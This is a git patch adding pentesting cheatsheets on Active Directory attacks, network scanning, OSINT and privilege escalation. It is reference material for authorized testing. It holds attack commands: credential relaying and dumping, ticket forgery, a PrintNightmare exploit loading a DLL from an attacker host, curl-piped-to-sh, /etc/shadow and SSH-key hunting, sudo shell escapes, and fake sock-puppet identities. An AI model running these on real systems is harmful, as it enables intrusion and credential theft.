From 09fb57770c06ef970af978c8f0755bb077f531e3 Mon Sep 17 00:00:00 2001 From: rpriven Date: Sun, 4 Jan 2026 02:47:19 -0700 Subject: [PATCH] Added active-directory, network-pentesting, osint, privilege-escalation, web-application-security cheatsheets --- README.md | 9 +- infosec/active-directory.md | 425 ++++++++++++++++++++++ infosec/network-pentesting.md | 425 ++++++++++++++++++++++ infosec/osint.md | 405 +++++++++++++++++++++ infosec/privilege-escalation.md | 539 ++++++++++++++++++++++++++++ infosec/web-application-security.md | 337 +++++++++++++++++ 6 files changed, 2138 insertions(+), 2 deletions(-) create mode 100644 infosec/active-directory.md create mode 100644 infosec/network-pentesting.md create mode 100644 infosec/osint.md create mode 100644 infosec/privilege-escalation.md create mode 100644 infosec/web-application-security.md diff --git a/README.md b/README.md index 137f509..e8d87b2 100644 --- a/README.md +++ b/README.md @@ -14,14 +14,20 @@ A collection of security, pentesting, and technical reference cheatsheets. | Cheatsheet | Description | |------------|-------------| +| [Web Application Security](infosec/web-application-security.md) | OWASP Top 10, SQLi, XSS, SSRF, and web app testing | +| [Network Pentesting](infosec/network-pentesting.md) | Nmap, Wireshark, service enumeration | +| [Privilege Escalation](infosec/privilege-escalation.md) | Linux and Windows privesc techniques | +| [Active Directory](infosec/active-directory.md) | AD attacks, Kerberoasting, BloodHound, lateral movement | +| [OSINT](infosec/osint.md) | Open source intelligence, reconnaissance, dorking | | [Pentesting Methodology](infosec/pentesting-methodology.md) | Basic methodology for pentesters | | [Penetration Testing Reporting](infosec/pentest-reporting.md) | Comprehensive guide for creating professional pentest reports | | [SOC Analyst Reference](infosec/soc-analyst.md) | Essential knowledge for Security Operations Center analysts | | [CTF Jeopardy Guide](infosec/ctf-jeopardy.md) | Techniques for solving common CTF challenge categories | | [PJPT Reference Guide](infosec/pjpt-reference.md) | Common commands and techniques for the PJPT certification | +| [CIS 18 Controls](infosec/cis_18_controls.md) | CIS Critical Security Controls reference | +| [Incident Response](infosec/incident-response.md) | Quick techniques for IR | | [GitHub Commands](infosec/github-commands.md) | Git and GitHub command reference | | [Command Line Reference](infosec/command-line-reference.md) | Cross-platform CLI commands | -| [Incident Response](infosec/incident-response.md) | Quick techniques for IR | ## AI Security @@ -29,7 +35,6 @@ A collection of security, pentesting, and technical reference cheatsheets. |------------|-------------| | [AI Pentesting](ai-security/ai-pentesting.md) | Framework for testing and securing AI systems | | [Prompt Engineering](ai-security/prompt-engineering.md) | Techniques for effective LLM prompting | -| [LLM Security](ai-security/llm-security.md) | Security considerations for large language models | ## Cryptography diff --git a/infosec/active-directory.md b/infosec/active-directory.md new file mode 100644 index 0000000..a11bebe --- /dev/null +++ b/infosec/active-directory.md @@ -0,0 +1,425 @@ +# Active Directory Pentesting Cheatsheet + +Quick reference for Active Directory enumeration, attacks, and post-exploitation. + +--- + +## AD Overview + +### Key Components +| Component | Description | +|-----------|-------------| +| Domain Controller (DC) | Central AD server, holds NTDS.dit | +| NTDS.dit | AD database with all user hashes | +| SYSVOL | Shared folder with GPOs and scripts | +| Kerberos | Authentication protocol | +| LDAP | Directory query protocol | + +### Common Ports +| Port | Service | +|------|---------| +| 53 | DNS | +| 88 | Kerberos | +| 135 | RPC | +| 139 | NetBIOS | +| 389 | LDAP | +| 445 | SMB | +| 464 | Kerberos password change | +| 636 | LDAPS | +| 3268 | Global Catalog | +| 3389 | RDP | + +--- + +## Initial Attack Vectors + +### LLMNR/NBT-NS Poisoning + +**Concept**: Intercept failed DNS lookups to capture NTLMv2 hashes. + +```bash +# Start Responder +responder -I eth0 -rdwv + +# Wait for authentication attempts... +# Captured hash format: user::domain:challenge:response:ntlmv2 + +# Crack with hashcat +hashcat -m 5600 hash.txt rockyou.txt +``` + +**Mitigation**: Disable LLMNR and NBT-NS via GPO. + +--- + +### SMB Relay + +**Concept**: Relay captured credentials to another machine (if SMB signing is disabled). + +```bash +# 1. Check for SMB signing +crackmapexec smb 192.168.1.0/24 --gen-relay-list targets.txt + +# 2. Configure Responder (disable SMB/HTTP) +# Edit /etc/responder/Responder.conf +# SMB = Off +# HTTP = Off + +# 3. Start ntlmrelayx +impacket-ntlmrelayx -tf targets.txt -smb2support + +# 4. Start Responder +responder -I eth0 -rdwv + +# For shell access: +impacket-ntlmrelayx -tf targets.txt -smb2support -i + +# Then connect with nc to the specified port +``` + +--- + +### IPv6 DNS Takeover + +```bash +# mitm6 spoofs as IPv6 DNS server +mitm6 -d domain.local + +# Relay with ntlmrelayx +impacket-ntlmrelayx -6 -t ldaps://dc.domain.local -wh fakewpad.domain.local -l loot +``` + +--- + +## Post-Compromise Enumeration + +### Domain Information + +```cmd +# From Windows +net user /domain +net group /domain +net group "Domain Admins" /domain +net group "Enterprise Admins" /domain +``` + +```powershell +# PowerView +. .\PowerView.ps1 +Get-Domain +Get-DomainController +Get-DomainUser +Get-DomainGroup +Get-DomainComputer +``` + +### BloodHound + +```bash +# Install +sudo apt install bloodhound neo4j + +# Start neo4j +sudo neo4j console +# Navigate to http://localhost:7474, login neo4j:neo4j, change password + +# Start BloodHound +bloodhound +``` + +```powershell +# Collect data with SharpHound +powershell -ep bypass +. .\SharpHound.ps1 +Invoke-BloodHound -CollectionMethod All -Domain domain.local -ZipFileName output.zip +``` + +```bash +# Or use bloodhound-python from Linux +bloodhound-python -u user -p 'password' -d domain.local -ns -c all +``` + +**Key Queries**: +- "Find Shortest Paths to Domain Admins" +- "Find Principals with DCSync Rights" +- "List all Kerberoastable Accounts" + +--- + +## Credential Attacks + +### Pass the Password + +```bash +# Spray password across network +crackmapexec smb 192.168.1.0/24 -u username -d DOMAIN -p 'Password123' + +# Check specific hosts +crackmapexec smb 192.168.1.100 -u username -d DOMAIN -p 'Password123' + +# Execute command +crackmapexec smb 192.168.1.100 -u user -d DOMAIN -p 'pass' -x 'whoami' + +# Get shell with psexec +impacket-psexec DOMAIN/user:'password'@192.168.1.100 +``` + +### Pass the Hash + +**Note**: Only NTLM hashes work, not NTLMv2. + +```bash +# With CrackMapExec +crackmapexec smb 192.168.1.0/24 -u user -H --local-auth + +# Get shell +impacket-psexec user@192.168.1.100 -hashes +impacket-wmiexec user@192.168.1.100 -hashes + +# Example (blank LM hash) +impacket-psexec administrator@192.168.1.100 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 +``` + +### Dumping Hashes + +```bash +# With credentials +impacket-secretsdump DOMAIN/user:'password'@192.168.1.100 + +# With hash +impacket-secretsdump user@192.168.1.100 -hashes + +# From DC (DCSync) +impacket-secretsdump DOMAIN/admin:'password'@DC-IP -just-dc-ntlm +``` + +### Cracking Hashes + +```bash +# NTLM hashes +hashcat -m 1000 ntlm_hashes.txt rockyou.txt + +# NTLMv2 hashes (from Responder) +hashcat -m 5600 ntlmv2_hashes.txt rockyou.txt + +# Kerberos TGS (Kerberoasting) +hashcat -m 13100 tgs_hashes.txt rockyou.txt + +# Kerberos AS-REP (AS-REP Roasting) +hashcat -m 18200 asrep_hashes.txt rockyou.txt +``` + +--- + +## Kerberos Attacks + +### Kerberoasting + +**Concept**: Request TGS tickets for SPNs, crack service account passwords offline. + +```bash +# Get TGS tickets +impacket-GetUserSPNs DOMAIN/user:password -dc-ip -request + +# Save hash and crack +hashcat -m 13100 tgs_hash.txt rockyou.txt +``` + +```powershell +# From Windows with Rubeus +.\Rubeus.exe kerberoast /outfile:hashes.txt +``` + +**Mitigation**: Strong service account passwords, Managed Service Accounts. + +--- + +### AS-REP Roasting + +**Concept**: Get AS-REP for accounts without pre-authentication. + +```bash +# Find vulnerable accounts and get hashes +impacket-GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip -format hashcat + +# Crack +hashcat -m 18200 asrep_hash.txt rockyou.txt +``` + +--- + +### Golden Ticket + +**Concept**: Forge TGT with krbtgt hash for persistent domain access. + +```bash +# Get krbtgt hash (requires DA) +impacket-secretsdump DOMAIN/admin:password@DC-IP -just-dc-user krbtgt + +# Create golden ticket +impacket-ticketer -nthash -domain-sid -domain DOMAIN administrator + +# Use ticket +export KRB5CCNAME=administrator.ccache +impacket-psexec DOMAIN/administrator@target -k -no-pass +``` + +--- + +### Silver Ticket + +**Concept**: Forge TGS for specific service with service account hash. + +```bash +# Create silver ticket for CIFS (file shares) +impacket-ticketer -nthash -domain-sid -domain DOMAIN -spn CIFS/target.domain.local user + +export KRB5CCNAME=user.ccache +impacket-smbclient //target.domain.local/share -k -no-pass +``` + +--- + +## Token Impersonation + +```powershell +# Incognito (Meterpreter) +load incognito +list_tokens -u +impersonate_token "DOMAIN\\Administrator" + +# With Mimikatz +privilege::debug +token::elevate +``` + +--- + +## Mimikatz + +```powershell +# Dump credentials +privilege::debug +sekurlsa::logonpasswords + +# DCSync attack +lsadump::dcsync /domain:domain.local /user:Administrator + +# Pass the hash +sekurlsa::pth /user:admin /domain:domain.local /ntlm: + +# Golden ticket +kerberos::golden /user:Administrator /domain:domain.local /sid: /krbtgt: /ptt + +# Dump SAM +lsadump::sam +``` + +--- + +## Lateral Movement + +### PsExec +```bash +impacket-psexec DOMAIN/user:password@target +impacket-psexec user@target -hashes +``` + +### WMIExec +```bash +impacket-wmiexec DOMAIN/user:password@target +``` + +### Evil-WinRM +```bash +evil-winrm -i target -u user -p password +evil-winrm -i target -u user -H +``` + +### SMBExec +```bash +impacket-smbexec DOMAIN/user:password@target +``` + +--- + +## Known Vulnerabilities + +### ZeroLogon (CVE-2020-1472) +```bash +# Test +python3 zerologon_tester.py DC-NAME DC-IP + +# Exploit (resets DC password to empty) +python3 cve-2020-1472-exploit.py DC-NAME DC-IP + +# Dump hashes +impacket-secretsdump -just-dc -no-pass DC-NAME\$@DC-IP +``` + +### PrintNightmare (CVE-2021-1675 / CVE-2021-34527) +```bash +# Check vulnerability +rpcdump.py @DC-IP | grep MS-RPRN +rpcdump.py @DC-IP | grep MS-PAR + +# Exploit +python3 CVE-2021-1675.py DOMAIN/user:password@DC-IP '\\attacker-ip\share\evil.dll' +``` + +### noPac (CVE-2021-42278 / CVE-2021-42287) +```bash +# Scanner +python3 scanner.py DOMAIN/user:password -dc-ip DC-IP + +# Exploit +python3 noPac.py DOMAIN/user:password -dc-ip DC-IP -shell +``` + +--- + +## Useful Tools + +| Tool | Purpose | +|------|---------| +| CrackMapExec | Swiss army knife for AD | +| Impacket | Python AD tools suite | +| BloodHound | AD attack path visualization | +| Mimikatz | Credential extraction | +| Rubeus | Kerberos abuse | +| PowerView | PowerShell AD recon | +| Evil-WinRM | WinRM shell | +| Responder | LLMNR/NBT-NS poisoning | +| kerbrute | Kerberos brute forcing | + +--- + +## Attack Flow + +``` +1. LLMNR/NBT-NS Poisoning + ↓ +2. Crack hashes / Relay attacks + ↓ +3. Enumerate with BloodHound + ↓ +4. Kerberoast service accounts + ↓ +5. Lateral movement (Pass the Hash/Password) + ↓ +6. Find path to Domain Admin + ↓ +7. DCSync for all hashes + ↓ +8. Golden Ticket for persistence +``` + +--- + +## Resources + +- [WADComs](https://wadcoms.github.io/) - AD command reference +- [HackTricks AD](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology) +- [PayloadsAllTheThings AD](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md) +- [The Hacker Recipes](https://www.thehacker.recipes/) +- [ired.team](https://www.ired.team/) diff --git a/infosec/network-pentesting.md b/infosec/network-pentesting.md new file mode 100644 index 0000000..5407782 --- /dev/null +++ b/infosec/network-pentesting.md @@ -0,0 +1,425 @@ +# Network Pentesting Cheatsheet + +Quick reference for network reconnaissance, port scanning, and traffic analysis. + +--- + +## Nmap + +### Basic Scans +```bash +# Quick scan +nmap + +# Version detection +nmap -sV + +# OS detection +nmap -O + +# Aggressive scan (OS, version, scripts, traceroute) +nmap -A + +# All ports +nmap -p- + +# Specific ports +nmap -p 80,443,8080 + +# Port range +nmap -p 1-1000 +``` + +### Scan Types +```bash +# TCP SYN (stealth) - default, requires root +nmap -sS + +# TCP connect - no root needed +nmap -sT + +# UDP scan +nmap -sU + +# Combined TCP/UDP +nmap -sS -sU + +# NULL scan (no flags) +nmap -sN + +# FIN scan +nmap -sF + +# Xmas scan (URG, PSH, FIN) +nmap -sX +``` + +### Speed and Timing +```bash +# Timing templates (0=paranoid, 5=insane) +nmap -T0 # Slowest, IDS evasion +nmap -T3 # Normal (default) +nmap -T4 # Aggressive +nmap -T5 # Fastest + +# Rate limiting +nmap --min-rate 1000 +nmap --max-rate 100 +``` + +### Output Formats +```bash +# Normal output +nmap -oN scan.txt + +# Grepable output +nmap -oG scan.grep + +# XML output +nmap -oX scan.xml + +# All formats +nmap -oA scan +``` + +### NSE Scripts +```bash +# Default scripts +nmap -sC +nmap --script=default + +# Specific script +nmap --script=http-title + +# Script categories +nmap --script=vuln +nmap --script=safe +nmap --script=discovery + +# Multiple scripts +nmap --script=http-title,http-headers + +# Wildcard +nmap --script=http-* + +# Script help +nmap --script-help=http-title +``` + +### Common Script Categories +| Category | Description | +|----------|-------------| +| auth | Authentication bypass | +| broadcast | Network discovery | +| brute | Brute force attacks | +| default | Safe, useful scripts | +| discovery | Information gathering | +| exploit | Exploit vulnerabilities | +| fuzzer | Fuzzing tests | +| safe | Won't crash targets | +| vuln | Vulnerability scanning | + +### Firewall Evasion +```bash +# Fragment packets (8 bytes) +nmap -f + +# Fragment packets (16 bytes) +nmap -ff + +# Custom MTU (must be multiple of 8) +nmap --mtu 24 + +# Decoy scan +nmap -D RND:10 +nmap -D decoy1,decoy2,ME + +# Spoof source port +nmap -g 53 +nmap --source-port 80 + +# Skip ping (assume host is up) +nmap -Pn + +# Custom user agent +nmap --script-args http.useragent="Mozilla/5.0" + +# Scan delay (evade rate limiting) +nmap --scan-delay 1s + +# Bad checksum (test firewall response) +nmap --badsum +``` + +### Host Discovery +```bash +# Ping sweep +nmap -sn 192.168.1.0/24 + +# ARP scan (local network) +nmap -PR 192.168.1.0/24 + +# List scan (no probe, DNS only) +nmap -sL 192.168.1.0/24 + +# TCP SYN ping +nmap -PS22,80,443 + +# TCP ACK ping +nmap -PA80,443 + +# UDP ping +nmap -PU53 +``` + +### Favorite Commands +```bash +# Comprehensive scan +nmap -A -vv -sV -sC -oA scan + +# OSCP-style initial +nmap -sV -sC -oN initial.txt + +# Full port scan +nmap -T4 -sS -Pn -p- -oN allports.txt + +# Quick top 1000 +nmap -sV -sC -T4 + +# Vuln scan +nmap --script=vuln -oN vulns.txt +``` + +--- + +## Wireshark + +### Display Filters + +#### IP Filtering +``` +ip.addr == 192.168.1.1 # Traffic to/from IP +ip.src == 192.168.1.1 # Source IP +ip.dst == 192.168.1.1 # Destination IP +ip.addr == 192.168.1.0/24 # Subnet +ip.addr != 192.168.1.1 # Exclude IP +``` + +#### Port Filtering +``` +tcp.port == 80 # TCP port 80 +udp.port == 53 # UDP port 53 +tcp.port == 80 || tcp.port == 443 # HTTP or HTTPS +tcp.dstport == 443 # Destination port +tcp.srcport == 8080 # Source port +``` + +#### Protocol Filtering +``` +http # HTTP traffic +dns # DNS traffic +tcp # TCP traffic +udp # UDP traffic +icmp # ICMP traffic +arp # ARP traffic +ssl || tls # Encrypted traffic +``` + +#### TCP Flags +``` +tcp.flags.syn == 1 # SYN packets +tcp.flags.syn == 1 && tcp.flags.ack == 0 # SYN only +tcp.flags.reset == 1 # RST packets +tcp.flags == 0x002 # SYN flag +tcp.flags == 0x012 # SYN-ACK +``` + +#### HTTP Filtering +``` +http.request # HTTP requests +http.response # HTTP responses +http.request.method == "GET" # GET requests +http.request.method == "POST" # POST requests +http.host contains "google" # Host contains +http.response.code == 200 # Status code +http.request.uri contains "login" # URI contains +``` + +#### Content Filtering +``` +frame contains "password" # Frame contains string +http contains "admin" # HTTP contains +tcp contains "secret" # TCP contains +``` + +### Analysis Filters +``` +# Bad TCP +tcp.analysis.flags && !tcp.analysis.window_update + +# Retransmissions +tcp.analysis.retransmission + +# Slow round trip +tcp.analysis.initial_rtt > 1 + +# TCP delays +tcp.time_delta > 0.1 + +# Slow HTTP +http.time > 0.025 + +# Slow DNS +dns.time > 1 + +# Suspicious TTL +ip.ttl < 50 && ip.ttl > 30 + +# Filter out noise +!(eth.addr == ff:ff:ff:ff:ff:ff || arp || icmp || stp || cdp || lldp) +``` + +### Special Operators +``` +contains # Substring match (case-sensitive) +matches # Regex match +in {range} # Range match +``` + +#### Examples +``` +frame contains "google" +http.host matches "\.(org|com|net)" +tcp.port in {80 443 8000..8004} +``` + +### CLI Tools + +#### dumpcap +```bash +# List interfaces +dumpcap -D + +# Capture on interface +dumpcap -i 1 -w capture.pcapng + +# Ring buffer (10 files, 500MB each) +dumpcap -i 1 -w capture.pcapng -b filesize:500000 -b files:10 +``` + +#### tcpdump +```bash +# Capture all traffic +tcpdump -i eth0 + +# Capture to file +tcpdump -i eth0 -w capture.pcap + +# Read from file +tcpdump -r capture.pcap + +# Filter by host +tcpdump host 192.168.1.1 + +# Filter by port +tcpdump port 80 + +# Filter by protocol +tcpdump icmp +tcpdump tcp + +# Verbose output +tcpdump -v -i eth0 +tcpdump -vvv -i eth0 +``` + +#### tshark +```bash +# Capture +tshark -i eth0 -w capture.pcap + +# Read and filter +tshark -r capture.pcap -Y "http" + +# Extract fields +tshark -r capture.pcap -T fields -e ip.src -e ip.dst +``` + +--- + +## Service Enumeration + +### Common Ports +| Port | Service | Enumeration | +|------|---------|-------------| +| 21 | FTP | `nmap --script=ftp-* -p21` | +| 22 | SSH | `nmap --script=ssh-* -p22` | +| 23 | Telnet | `nmap --script=telnet-* -p23` | +| 25 | SMTP | `nmap --script=smtp-* -p25` | +| 53 | DNS | `nmap --script=dns-* -p53` | +| 80 | HTTP | `nmap --script=http-* -p80` | +| 110 | POP3 | `nmap --script=pop3-* -p110` | +| 139/445 | SMB | `nmap --script=smb-* -p139,445` | +| 143 | IMAP | `nmap --script=imap-* -p143` | +| 443 | HTTPS | `nmap --script=ssl-*,http-* -p443` | +| 3306 | MySQL | `nmap --script=mysql-* -p3306` | +| 3389 | RDP | `nmap --script=rdp-* -p3389` | +| 5432 | PostgreSQL | `nmap --script=pgsql-* -p5432` | + +### SMB Enumeration +```bash +# Enum shares +smbclient -L // -N +nmap --script=smb-enum-shares -p445 + +# Connect to share +smbclient ///share -U username + +# Enum users +nmap --script=smb-enum-users -p445 + +# Check for vulnerabilities +nmap --script=smb-vuln-* -p445 + +# CrackMapExec +crackmapexec smb +crackmapexec smb --shares +crackmapexec smb -u user -p pass +``` + +### DNS Enumeration +```bash +# Zone transfer +dig axfr @ +nmap --script=dns-zone-transfer -p53 + +# Reverse lookup +dig -x + +# DNS brute force +nmap --script=dns-brute +``` + +--- + +## Useful Tools + +| Tool | Purpose | +|------|---------| +| nmap | Port scanning, service detection | +| masscan | Fast port scanning | +| Wireshark | Packet analysis | +| tcpdump | CLI packet capture | +| netcat | Network Swiss army knife | +| CrackMapExec | SMB/AD enumeration | +| enum4linux | SMB/Samba enumeration | +| Responder | LLMNR/NBT-NS poisoning | + +--- + +## Resources + +- [Nmap Book](https://nmap.org/book/) +- [Nmap Scripting Engine](https://nmap.org/nsedoc/) +- [Wireshark User Guide](https://www.wireshark.org/docs/wsug_html/) +- [Wireshark Display Filters](https://wiki.wireshark.org/DisplayFilters) diff --git a/infosec/osint.md b/infosec/osint.md new file mode 100644 index 0000000..392afbe --- /dev/null +++ b/infosec/osint.md @@ -0,0 +1,405 @@ +# OSINT Cheatsheet + +Quick reference for Open Source Intelligence gathering, reconnaissance, and information discovery. + +--- + +## Search Engine Operators + +### Google Dorking + +| Operator | Description | Example | +|----------|-------------|---------| +| `site:` | Search within site | `site:example.com` | +| `filetype:` | Find file types | `filetype:pdf` | +| `intitle:` | Search in title | `intitle:"index of"` | +| `inurl:` | Search in URL | `inurl:admin` | +| `intext:` | Search in body | `intext:password` | +| `cache:` | Cached version | `cache:example.com` | +| `"..."` | Exact match | `"admin login"` | +| `*` | Wildcard | `"admin * password"` | +| `-` | Exclude | `site:example.com -www` | +| `OR` | Either term | `admin OR login` | +| `..` | Number range | `$100..$500` | + +### Useful Dorks +``` +# Find exposed directories +intitle:"index of" "parent directory" + +# Find login pages +inurl:login OR inurl:admin OR inurl:portal + +# Find exposed files +site:example.com filetype:pdf OR filetype:doc OR filetype:xls + +# Find config files +filetype:env OR filetype:cfg OR filetype:conf + +# Find backup files +filetype:bak OR filetype:old OR filetype:backup + +# Find exposed databases +filetype:sql "insert into" OR "create table" + +# Find credentials +intext:password filetype:log +"username" "password" filetype:csv + +# Find vulnerable pages +inurl:php?id= +inurl:index.php?id= +``` + +### Other Search Engines +- **Bing**: Similar operators, sometimes different results +- **DuckDuckGo**: Privacy-focused, `site:`, `filetype:` +- **Yandex**: Better for Russian/Eastern European content +- **Baidu**: Chinese content + +--- + +## Domain & Website OSINT + +### DNS & Whois +```bash +# Whois lookup +whois example.com + +# DNS records +dig example.com ANY +dig example.com MX +dig example.com TXT +nslookup -type=any example.com + +# Zone transfer (if allowed) +dig axfr @ns1.example.com example.com +``` + +### Online Tools +| Tool | URL | Purpose | +|------|-----|---------| +| ViewDNS | viewdns.info | DNS, IP, whois | +| SecurityTrails | securitytrails.com | Historical DNS | +| DNSDumpster | dnsdumpster.com | DNS recon | +| crt.sh | crt.sh | Certificate transparency | +| Shodan | shodan.io | Internet-connected devices | +| Censys | censys.io | Similar to Shodan | +| BuiltWith | builtwith.com | Technology profiler | +| Wappalyzer | wappalyzer.com | Tech detection | +| Wayback Machine | web.archive.org | Historical snapshots | + +### Subdomain Enumeration +```bash +# Amass +amass enum -d example.com + +# Subfinder +subfinder -d example.com + +# Sublist3r +sublist3r -d example.com + +# Certificate transparency +curl -s "https://crt.sh/?q=%.example.com&output=json" | jq -r '.[].name_value' | sort -u + +# DNS brute force +gobuster dns -d example.com -w wordlist.txt +``` + +### Technology Detection +```bash +# Whatweb +whatweb example.com + +# Wappalyzer CLI +wappalyzer https://example.com +``` + +--- + +## Email OSINT + +### Email Verification +| Tool | URL | +|------|-----| +| Hunter.io | hunter.io | +| EmailHippo | emailhippo.com | +| Verify Email | verify-email.org | +| Email-Checker | email-checker.net | + +### Email Discovery +```bash +# theHarvester +theHarvester -d example.com -b all + +# Hunter.io API +curl "https://api.hunter.io/v2/domain-search?domain=example.com&api_key=YOUR_KEY" +``` + +### Email Header Analysis +| Tool | URL | +|------|-----| +| MXToolbox | mxtoolbox.com/EmailHeaders.aspx | +| Google Admin Toolbox | toolbox.googleapps.com/apps/messageheader | + +--- + +## Username & People OSINT + +### Username Search +| Tool | URL | Purpose | +|------|-----|---------| +| Namechk | namechk.com | Username availability | +| WhatsMyName | whatsmyname.app | Cross-platform search | +| Sherlock | github.com/sherlock-project | CLI username search | +| Maigret | github.com/soxoj/maigret | Sherlock alternative | + +```bash +# Sherlock +python3 sherlock username + +# Maigret +maigret username +``` + +### People Search +| Tool | Purpose | +|------|---------| +| Pipl | People search engine | +| Spokeo | US people search | +| BeenVerified | Background checks | +| ThatsThem | Free people search | +| TruePeopleSearch | Free US lookup | +| Webmii | Aggregated web presence | + +### Social Media +| Platform | OSINT Approach | +|----------|----------------| +| LinkedIn | Company employees, roles, connections | +| Twitter/X | Public posts, followers, connections | +| Facebook | Public profiles, photos, check-ins | +| Instagram | Photos, locations, stories | +| GitHub | Code, email in commits, contributions | + +--- + +## Image OSINT + +### Reverse Image Search +| Tool | URL | +|------|-----| +| Google Images | images.google.com | +| TinEye | tineye.com | +| Yandex Images | yandex.com/images | +| Bing Images | bing.com/images | + +### Metadata Extraction +```bash +# ExifTool +exiftool image.jpg + +# View GPS coordinates +exiftool -gpslatitude -gpslongitude image.jpg + +# Remove metadata +exiftool -all= image.jpg +``` + +### Geolocation +| Tool | URL | +|------|-----| +| GeoGuessr | geoguessr.com | +| Google Earth | earth.google.com | +| Mapillary | mapillary.com | +| SunCalc | suncalc.org | + +--- + +## Password & Breach OSINT + +### Breach Databases +| Tool | URL | Notes | +|------|-----|-------| +| Have I Been Pwned | haveibeenpwned.com | Check if email breached | +| DeHashed | dehashed.com | Paid breach search | +| LeakCheck | leakcheck.io | Email/username search | +| IntelX | intelx.io | Multiple data types | +| Snusbase | snusbase.com | Breach database | + +### Password Policy Discovery +```bash +# Check password policies in AD +crackmapexec smb target -u user -p pass --pass-pol +``` + +--- + +## Business & Company OSINT + +### Company Information +| Tool | URL | Purpose | +|------|-----|---------| +| OpenCorporates | opencorporates.com | Global company database | +| Crunchbase | crunchbase.com | Startup/company info | +| LinkedIn | linkedin.com | Employees, structure | +| SEC EDGAR | sec.gov/edgar | US public filings | +| Companies House | companieshouse.gov.uk | UK company data | + +### Financial +| Tool | URL | +|------|-----| +| Bloomberg | bloomberg.com | +| Yahoo Finance | finance.yahoo.com | +| Google Finance | google.com/finance | + +--- + +## Network & Infrastructure OSINT + +### Shodan +```bash +# CLI +shodan search "hostname:example.com" +shodan host 1.2.3.4 + +# Common queries +org:"Target Company" +hostname:example.com +port:22 +product:Apache +ssl.cert.subject.cn:example.com +``` + +### Censys +```bash +# Search syntax +services.http.response.html_title:"Example" +ip:1.2.3.4 +autonomous_system.name:"Example ISP" +``` + +### BGP & ASN +| Tool | URL | +|------|-----| +| BGP.he.net | bgp.he.net | +| ASN Lookup | asnlookup.com | +| BGPView | bgpview.io | + +--- + +## Wireless OSINT + +| Tool | URL | Purpose | +|------|-----|---------| +| Wigle | wigle.net | WiFi network database | +| WifiMap | wifimap.io | WiFi passwords | + +--- + +## OSINT Tools - CLI + +### theHarvester +```bash +# All sources +theHarvester -d example.com -b all + +# Specific sources +theHarvester -d example.com -b google,linkedin,twitter +``` + +### Recon-ng +```bash +# Start +recon-ng + +# Install modules +marketplace search +marketplace install all + +# Set workspace +workspaces create example +db insert domains +domains add example.com + +# Run modules +modules load recon/domains-hosts/hackertarget +run +``` + +### SpiderFoot +```bash +# Run scan +spiderfoot -s example.com -o output.html +``` + +### Maltego +- GUI-based relationship mapping +- Entity transformations +- Visualize connections + +--- + +## OSINT Workflow + +``` +1. Define scope and objectives + ↓ +2. Passive reconnaissance + - Search engines + - Social media + - Public records + ↓ +3. Domain/Infrastructure + - DNS, Whois + - Subdomains + - Technology stack + ↓ +4. People/Organization + - Employees + - Email addresses + - Usernames + ↓ +5. Breach data + - Exposed credentials + - Data leaks + ↓ +6. Document findings + - Organize data + - Create report +``` + +--- + +## Sock Puppets + +### Creating Fake Identities +- Use AI-generated photos (thispersondoesnotexist.com) +- Create dedicated email (ProtonMail) +- Use VPN/Tor +- Build history over time +- Keep consistent persona + +### Operational Security +- Separate browser/profile +- No real personal info +- Different IP addresses +- Avoid linking accounts + +--- + +## Resources + +### Websites +- [OSINT Framework](https://osintframework.com/) +- [IntelTechniques](https://inteltechniques.com/) +- [OSINT Dojo](https://www.osintdojo.com/) +- [Bellingcat](https://www.bellingcat.com/) + +### Books +- "Open Source Intelligence Techniques" by Michael Bazzell +- "The OSINT Handbook" by Dale Meredith + +### Training +- [TCM Security OSINT Fundamentals](https://academy.tcm-sec.com/) +- [SANS SEC487](https://www.sans.org/cyber-security-courses/open-source-intelligence-gathering/) diff --git a/infosec/privilege-escalation.md b/infosec/privilege-escalation.md new file mode 100644 index 0000000..5de5e04 --- /dev/null +++ b/infosec/privilege-escalation.md @@ -0,0 +1,539 @@ +# Privilege Escalation Cheatsheet + +Quick reference for Linux and Windows privilege escalation techniques. + +--- + +# Linux Privilege Escalation + +## Initial Enumeration + +### System Information +```bash +# Who am I? +whoami +id + +# Hostname and kernel +hostname +uname -a +cat /proc/version +cat /etc/issue + +# Architecture +lscpu + +# Running processes +ps aux +ps aux | grep root +``` + +### User Enumeration +```bash +# Current user privileges +sudo -l + +# List users +cat /etc/passwd +cat /etc/passwd | cut -d: -f1 + +# Password hashes (if readable) +cat /etc/shadow + +# Groups +cat /etc/group + +# Command history +history +cat ~/.bash_history +``` + +### Network Enumeration +```bash +# IP address +ifconfig +ip a + +# Routes +ip route +route -n + +# ARP table +arp -a +ip neigh + +# Open ports +netstat -ano +ss -tulpn + +# Active connections +netstat -antup +``` + +### Password Hunting +```bash +# Search for passwords +grep --color=auto -rnw '/' -ie "PASSWORD=" 2>/dev/null +grep --color=auto -rnw '/' -ie "PASS=" 2>/dev/null + +# Find password files +locate password | more +find / -name "*.txt" -exec grep -l "password" {} \; 2>/dev/null + +# SSH keys +find / -name authorized_keys 2>/dev/null +find / -name id_rsa 2>/dev/null +find / -name id_dsa 2>/dev/null + +# Config files +find / -name "*.conf" 2>/dev/null | xargs grep -l "pass" 2>/dev/null +``` + +--- + +## Automated Tools + +```bash +# LinPEAS +curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh + +# LinEnum +./LinEnum.sh -t + +# linux-exploit-suggester +./linux-exploit-suggester.sh + +# pspy (process monitoring) +./pspy64 +``` + +--- + +## Kernel Exploits + +```bash +# Check kernel version +uname -r +uname -a + +# Search for exploits +searchsploit linux kernel +searchsploit linux kernel 4.4 + +# Common kernel exploits +# Dirty COW (CVE-2016-5195) - Linux < 4.8.3 +# DirtyCred (CVE-2022-2588) +``` + +--- + +## Sudo Abuse + +### Check Sudo Permissions +```bash +sudo -l +``` + +### GTFOBins Exploitation +```bash +# vim +sudo vim -c ':!/bin/sh' + +# awk +sudo awk 'BEGIN {system("/bin/bash")}' + +# find +sudo find . -exec /bin/sh \; -quit + +# less/more +sudo less /etc/passwd +!/bin/sh + +# nmap (old versions) +sudo nmap --interactive +!sh + +# python +sudo python -c 'import os; os.system("/bin/sh")' + +# perl +sudo perl -e 'exec "/bin/sh";' + +# ruby +sudo ruby -e 'exec "/bin/sh"' +``` + +### LD_PRELOAD +```bash +# If sudo -l shows: 